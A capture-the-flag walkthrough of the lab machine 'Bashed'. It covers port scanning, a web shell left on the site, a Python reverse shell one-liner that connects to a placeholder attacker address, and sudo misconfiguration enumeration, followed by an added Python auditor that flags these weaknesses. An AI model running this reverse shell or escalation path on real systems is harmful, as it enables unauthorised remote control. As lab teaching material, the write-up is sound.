naabu -host bashed.htb -v
[naabu ASCII banner, v2.0.5, projectdiscovery.io]
[INF] Running CONNECT scan with non root privileges
[DBG] Using host 10.10.10.68 for enumeration
[INF] Found 1 ports on host bashed.htb (10.10.10.68)
bashed.htb:80
Open ports:
80/tcp - web server
Visiting the web page presents us with phpbash. After some googling and poking around it turns out that phpbash is a web shell, so the developer may have left it somewhere on the site, which would give us remote code execution?
/dev looks suspicious; visiting it shows two PHP files:
phpbash.php
phpbash.min.php
Foothold
Several reverse shell payloads were tried; this one works:
export RHOST="YOUR_IP";export RPORT=4567;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
Get Stable Shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
press CTRL+Z (send the shell to the background)
stty raw -echo; fg (fix the terminal and bring the shell back to the foreground)
press ENTER to get the prompt back
Checks
id
sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
Priv Esc
Cool, www-data can run anything as scriptmanager without a password:
sudo -u scriptmanager /bin/bash
config.php
cat config.php
<?php
//SITE GLOBAL CONFIGURATION
$email = "yourmail@here.com"; //<-- Your email
?>
No creds found, sadly.
/scripts was found in the root directory (/):
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Aug 23 08:29 scripts
Contents of the folder:
-rw-r--r-- 1 scriptmanager scriptmanager 218 Aug 23 08:29 test.py
-rw-r--r-- 1 root root 12 Aug 23 08:29 test.txt
At first glance it looks like test.py is run automatically and its output written to test.txt?
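As a defender's check added here (not part of the original writeup), this Python auditor parses the sudo -l output and the ls -l listing quoted above and flags the two findings the walkthrough rests on: a NOPASSWD rule granting ALL as another user, and a group-writable directory where a root-owned file sits beside a non-root user's script. The sample inputs are the page's own output embedded as constants; the regexes and function names are my own.

```python
import re

# Constructed sample input: the `sudo -l` output and the `ls -l` lines quoted in the writeup.
SUDO_L = r"""Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
"""
SCRIPTS_LS = """drwxrwxr-- 2 scriptmanager scriptmanager 4096 Aug 23 08:29 scripts
-rw-r--r-- 1 scriptmanager scriptmanager 218 Aug 23 08:29 test.py
-rw-r--r-- 1 root root 12 Aug 23 08:29 test.txt
"""

# "(runas_user : runas_group) TAG: commands" as printed by sudo -l (parser is mine, not sudo's).
SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")
LS_LINE = re.compile(r"^(?P<mode>[-dl][rwxstT-]{9})[.+]?\s+\d+\s+(?P<user>\S+)\s+(?P<group>\S+)"
                     r"\s+\d+\s+\w+\s+\d+\s+[\d:]+\s+(?P<name>.+)$")

def risky_sudo_rules(sudo_l_output):
    """Return (runas_user, commands) for rules that need no password and allow ALL commands.
    Such a rule turns access to one account into full control of another."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = SUDO_RULE.match(line)
        if m and "NOPASSWD" in m.group("tags") and m.group("cmds").strip() == "ALL":
            findings.append((m.group("runas").split(":")[0].strip(), "ALL"))
    return findings

def parse_ls(ls_output):
    """Parse `ls -l` lines into dicts with mode, user, group and name; skip non-matching lines."""
    return [m.groupdict() for m in map(LS_LINE.match, ls_output.splitlines()) if m]

def user_writable_dir_with_root_output(ls_output, script_exts=(".py", ".sh")):
    """Return (script, root_file) pairs: a non-root user's script sitting beside a root-owned
    file inside a directory that user's group can write. This is the shape of /scripts on the
    box and usually means a privileged job runs user-controlled code; audit cron and systemd
    timers for it and move the script somewhere only root can write."""
    entries = parse_ls(ls_output)
    pairs = []
    for d in (e for e in entries if e["mode"][0] == "d"):
        if d["user"] == "root" or d["mode"][5] != "w":   # mode[5] is the group write bit
            continue
        files = [e for e in entries if e["mode"][0] == "-"]
        scripts = [f for f in files if f["user"] != "root" and f["name"].endswith(script_exts)]
        root_files = [f for f in files if f["user"] == "root"]
        pairs += [(s["name"], r["name"]) for s in scripts for r in root_files]
    return pairs

if __name__ == "__main__":
    print("NOPASSWD ALL rules:", risky_sudo_rules(SUDO_L))
    print("root-owned output beside user script:", user_writable_dir_with_root_output(SCRIPTS_LS))
```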